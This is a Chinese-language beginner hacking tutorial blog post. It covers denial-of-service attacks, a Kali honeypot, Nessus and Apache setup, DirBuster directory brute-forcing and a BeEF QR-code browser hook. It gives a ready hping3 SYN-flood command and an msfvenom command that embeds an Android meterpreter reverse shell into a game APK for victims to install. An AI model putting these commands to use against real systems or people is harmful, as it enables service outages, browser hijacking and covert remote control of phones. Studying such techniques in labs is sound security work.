黑客玩具入门——8、其他攻击手段

发布时间 2023-12-01 16:51:40作者: Zaking

1、拒绝服务攻击

使用某些手段故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。实际上拒绝服务攻击并不是一个攻击方式,它是一类具有相似特征的攻击方式的集合。拒绝服务攻击有以下分类:

1. 数据链路层的拒绝服务攻击

攻击目标:交换机

集线器:以前的内网都是用集线器,集线器不具备学习记忆功能,多台机器在通信的时候,都是将信息发给所有的机器,如果不是对应的机器接收到,就不做应答。它的缺点是,我们可以很简单的获取到整个网络内的所有信息。

交换机:交换机有学习和记忆的功能,在交换机内部有一个CAM的表,这个表可以记录交换机每个接口对应的计算机的MAC地址信息,有了这些信息,在传输数据的时候就可以一对一传输。

拒绝服务攻击利用方法:CAM表容量有限,如果我们在短时间内制造大量的不同源的MAC地址发来的数据包,CAM表就会被占满,导致交换机无法正常工作。

2.网络层的拒绝服务攻击

TCP和UDP就位于这一层,而基于TCP的拒绝服务攻击,就是大家常说的拒绝服务攻击。大部分的服务器都是提供HTTP服务的服务器,HTTP协议就是TCP提供的支持。基于TCP的拒绝服务攻击有两种:

  1. 和目标端口完成三次握手,建立一个完整链接
  2. 只和目标端口完成三次握手的前两次,建立一个不完整的链接,这种方式最常用。

利用工具:hping3。实验靶机:Metasploitable2。

命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip]

3.传输层的拒绝服务攻击

4.基于应用层的拒绝服务攻击

5.DDOS攻击

大家常说的DDOS攻击,翻译过来就是分布式拒绝服务攻击,也就是很多的机器同时对目标发起拒绝服务攻击,这就是为什么DDOS往往和肉鸡这个词一起出现的原因。

2、用Kali Linux 蜜罐引诱可能的攻击者进入陷阱

什么是蜜罐?许多安全专家都喜欢的一个东西就是蜜罐。简单地说,蜜罐是模拟特定网络攻击目标的系统。有了蜜罐,管理员可以检测并记录对某些服务发起的网络攻击,以及发起攻击的IP地址。建立一个蜜罐是相当简单的,使用Kali Linux和pentbox组合,可以在几分钟内启动和运行一个蜜罐。

可以使用以下命令下载蜜罐:

wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz

运行pentbox Ruby脚本:

./pentbox.rb

然后会看到一个菜单,在菜单中选择2(用于网络工具),然后选择3(用于蜜罐)。

然后会让你选择快捷设置还是手动设置,如果快捷设置报错了,那么可以使用手动设置,比如端口被占用等。

然后可以用另外一台电脑来访问该kali的ip地址,别忘了加端口号。

然后就没有然后了。

3、Nessus

Nessus是目前全世界最多人使用的系统漏洞扫描和分析工具。

1、安装

  1. 下载地址:https://www.tenable.com/downloads/nessus?loginAttempted=true。
  2. 下载kali linux的版本。注意要在kali的系统里的浏览器里下载哦。

  3. 然后,在你下载的那个文件夹里右键打开终端:

  4. 然后输入:sudo dpkg -i [安装包名]。
  5. 开启服务,命令已经告诉你了。sudo /bin/systemctl start nessusd.service

  6. 打开浏览器,访问上图中的链接地址。然后会出现个提示,就跟Windows访问不安全的地址一样,点灰色的按钮,接受就好了。

  7. 点击下一步,输入邮箱和姓名(随便写好伐)。

  8. 然后回车,然后会发给你一封信,信里有Activation Code,输入Activation Code

  9. 然后会输入用户名和密码。
  10. 然后就会更新软件,就完事了,当然也可能会失败。

2、使用方法

暂不介绍,自行百度。

4、Apache服务的使用方法

Apache是世界使用排名第一的web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

运行一个网站,可以作为文件上传下载的中转站。其实咱们之前都玩过了。

启动apache服务:sudo service apache2 start。

5、扫码控制

实践步骤:

  1. 修改虚拟机的联网模式为桥接模式
  2. 启动beef框架,打开后设置一个你记得住的密码。

  3. 复制网站模板(随便百度静态网站模板,就是静态的html页面)到kali中,把hook.js文件加入到模板的首页中。

     把这段js脚本代码,放到如下图所示即可,注意,看到下面红框里的<IP>没有?改成你的主机IP,就完事了。

  4. 把网站模板复制到Apache目录下:
    • 先把apache目录中原有的文件都删除掉:sudo rm -rf *。
    • 然后把刚才的index.html模板复制到该目录下,之前学过这命令,不说了
  5. 启动apache服务。也说过,再不知道回去看。
  6. 将网站首页的链接制作成二维码。通过草料二维码,把链接地址转换成二维码就可以了。
  7. 登录beef页面,地址在这里:

默认的用户名就是beef,密码就是刚才你设置的:

就进来了。

  1. 用手机扫描二维码。
  2. 然后你就可以在浏览器的beef标签里查看了。

所以!不要轻易扫码!!!

6、在软件中植入Payload

1.首先我下载了一个游戏,你自己随便下载。

2.在app中植入payload。啥意思不说了哈,都知道了。

 

sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk

3.然后开启主控端,进入meterpreter。

4.通过apache把apl发送到你的安卓手机上。

5.安装并打开游戏。

6.然后,做之前学过的事吧!

7、DirBuster目录爆破

要相对一个目标站点做渗透测试,首先要搞清楚的就是目标的目录结构。这个任务可以交给DirBuster来做。DirBuster是一个多线程Java应用程序,可以破解Web应用程序服务器上的目录和文件名。DirBuster自带字典文件,当然我们可以根据收集到的其他信息,针对性的生成更加好用的字典文件。

使用方法,要想使用DirBuster只需要简单的四部操作,实验靶机是owasp linux服务器:

  1. 设置目标网站网址(在kali中搜索DirBuster就能找到了):

     

  2. 设置软件扫码的速度,也就是线程数。默认为10,我们可以根据自己的需求设置,如果目标站点带宽不够且线程数太高,会导致目标站点无法正常访问。拖拽修改即可。

  3. 设置字典文件。字典可以使我们根据已收集到的信息对应生成的字典。也可以是dirbuster默认自带的几个字典。dirbuster自带的字典文件在/usr/share/dirbuster/wordlists/目录下。

  4. 这些不用动,点start就可以了。

  5. 然后,我们可以在下图的tabs中查看各种扫描结果信息